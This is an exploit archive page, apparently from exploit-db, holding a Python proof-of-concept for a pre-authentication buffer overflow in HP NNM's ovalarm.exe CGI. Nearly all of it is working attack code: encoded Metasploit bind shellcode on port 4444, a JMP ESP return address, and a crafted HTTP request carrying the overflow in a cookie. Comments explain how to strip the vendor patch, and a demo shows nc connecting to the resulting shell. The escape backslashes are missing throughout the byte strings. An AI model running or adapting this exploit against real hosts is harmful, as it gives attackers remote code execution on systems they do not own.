HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP NNM 7.53 ovalarm.exe CGI Pre Authentication Remote Buffer Overflow
# Published : 2009-12-12
# Author : sinn3r and muts
# Previous Title : IBM Informix Client SDK 3.0 nfx file integer overflow exploit
# Next Title : Sunbird 0.9 Array Overrun (code execution) 0day
#!/usr/bin/python
# HP NNP ovalarm.exe CGI Remote Buffer Overflow - Pre Authentication
# Tested on XP SP3 + IIS + NNM Release B.07.50
# Authors: muts & sinn3r  (x90.sinner {a.t} gmail.c0m)
# Reference: http://dvlabs.tippingpoint.com/advisory/TPTI-09-12
# http://www.offensive-security.com/0day/exploit-nnm-ovalarm.py.txt
#
# ** Big thanks to dookie for identifying the problem & testing for us! **
#
# IMPORTANT: How to recreate the vulnerable state:
# 1. Download NNM from exploit-db.com, install it
# 2. Go to Start -> All Programs -> HP OpenView Patches -> OpenView Network Node Manager 7.51 -> run "NNM_01187 Uninstall". And then reboot.
# 3. After the patch is removed, open command prompt, go to C:InetpubAdminScrips
#    cscript.exe adsutil.vbs set w3svc/CreateProcessAsUser "false"
#
# Demo:
# sinn3r@backtrack:~$ ./nnm.py 192.168.3.2
# [+] Sending evil buffer to NNMz
# [+] Done!
# sinn3r@backtrack:~$ nc -vn 192.168.3.2 4444
# (UNKNOWN) [192.168.3.2] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Program FilesHP OpenViewwwwcgi-bin> 
###################################################################################

import socket, sys

if (len(sys.argv) != 2):
        print "[+] HP NNM 7.53 ovalarm.exe CGI Remote Buffer Overflow"
	print "[+] Usage: %s <Target>" %sys.argv[0]
	sys.exit(0)

#win32_bind -  EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com 
shellcode = ("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"
"x4dx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"
"x4ex36x46x52x46x32x4bx58x45x34x4ex33x4bx58x4ex57"
"x45x30x4ax37x41x30x4fx4ex4bx48x4fx44x4ax41x4bx48"
"x4fx55x42x42x41x30x4bx4ex49x44x4bx58x46x53x4bx48"
"x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c"
"x46x37x47x30x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"
"x46x4fx4bx43x46x45x46x32x4ax32x45x47x45x4ex4bx48"
"x4fx55x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx34"
"x4bx38x4fx45x4ex51x41x50x4bx4ex43x50x4ex32x4bx58"
"x49x48x4ex56x46x32x4ex41x41x56x43x4cx41x43x4bx4d"
"x46x56x4bx48x43x54x42x43x4bx38x42x44x4ex50x4bx58"
"x42x37x4ex51x4dx4ax4bx48x42x44x4ax30x50x45x4ax36"
"x50x58x50x44x50x30x4ex4ex42x45x4fx4fx48x4dx48x46"
"x43x45x48x36x4ax46x43x43x44x53x4ax46x47x57x43x47"
"x44x53x4fx45x46x55x4fx4fx42x4dx4ax46x4bx4cx4dx4e"
"x4ex4fx4bx53x42x35x4fx4fx48x4dx4fx55x49x58x45x4e"
"x48x46x41x38x4dx4ex4ax30x44x50x45x35x4cx46x44x30"
"x4fx4fx42x4dx4ax56x49x4dx49x30x45x4fx4dx4ax47x35"
"x4fx4fx48x4dx43x45x43x35x43x55x43x35x43x35x43x34"
"x43x45x43x54x43x35x4fx4fx42x4dx48x36x4ax36x41x31"
"x4ex55x48x56x43x55x49x58x41x4ex45x39x4ax56x46x4a"
"x4cx51x42x37x47x4cx47x45x4fx4fx48x4dx4cx56x42x31"
"x41x55x45x35x4fx4fx42x4dx4ax46x46x4ax4dx4ax50x42"
"x49x4ex47x35x4fx4fx48x4dx43x45x45x45x4fx4fx42x4d"
"x4ax46x45x4ex49x54x48x48x49x44x47x35x4fx4fx48x4d"
"x42x45x46x35x46x45x45x55x4fx4fx42x4dx43x59x4ax36"
"x47x4ex49x37x48x4cx49x37x47x55x4fx4fx48x4dx45x35"
"x4fx4fx42x4dx48x56x4cx36x46x46x48x36x4ax36x43x46"
"x4dx56x49x38x45x4ex4cx36x42x45x49x45x49x52x4ex4c"
"x49x48x47x4ex4cx56x46x34x49x58x44x4ex41x33x42x4c"
"x43x4fx4cx4ax50x4fx44x44x4dx42x50x4fx44x34x4ex32"
"x43x49x4dx58x4cx47x4ax33x4bx4ax4bx4ax4bx4ax4ax36"
"x44x57x50x4fx43x4bx48x41x4fx4fx45x47x46x44x4fx4f"
"x48x4dx4bx55x47x55x44x45x41x35x41x55x41x45x4cx56"
"x41x30x41x55x41x55x45x45x41x45x4fx4fx42x4dx4ax46"
"x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx36"
"x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx38x47x45x4ex4f"
"x43x58x46x4cx46x36x4fx4fx48x4dx44x45x4fx4fx42x4d"
"x4ax46x4fx4ex50x4cx42x4ex42x46x43x45x4fx4fx48x4d"
"x4fx4fx42x4dx5a")

#9000 bytes; 7380+4+1616
#JMP ESP: 0x5A10A88B ovw.dll
#Note:  Other possible offsets to EIP we've seen:
#       [ "x41"*7392 ] + [ EIP ] + [ junk ]
#       [ "x41"*7332 ] + [ EIP ] + [ junk ]
buff = ("x41"*7380+
#Compensate for varying IP lengths
"x8bxa8x10x5a"
"xebx18x90x90"
"x8bxa8x10x5a"
"xebx11x90x90"
"x8bxa8x10x5a"
"xebx08x90x90"
"x8bxa8x10x5a"
"x90x90x90x90"
"x90x90x90x90"+
shellcode+
"xCC"*(1584-len(shellcode))
)


buffer = ("GET /OvCgi/ovalarm.exe HTTP/1.1rn"
"Host: 192.168.3.111rn"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)Gecko/20091102 Firefox/3.5.5rn"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"
"Accept-Language: en-usrn"
"Accept-Encoding: gzip,deflatern"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
"Cookie: OvAcceptLang=%s; ; OVABverbose=POSTrn"
"Cache-Control: max-age=0rn"
"rnrn") % buff 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
print "[+] Sending evil buffer to NNMz"
s.send(buffer)
#print s.recv(1024)
s.close()
print "[+] Done!"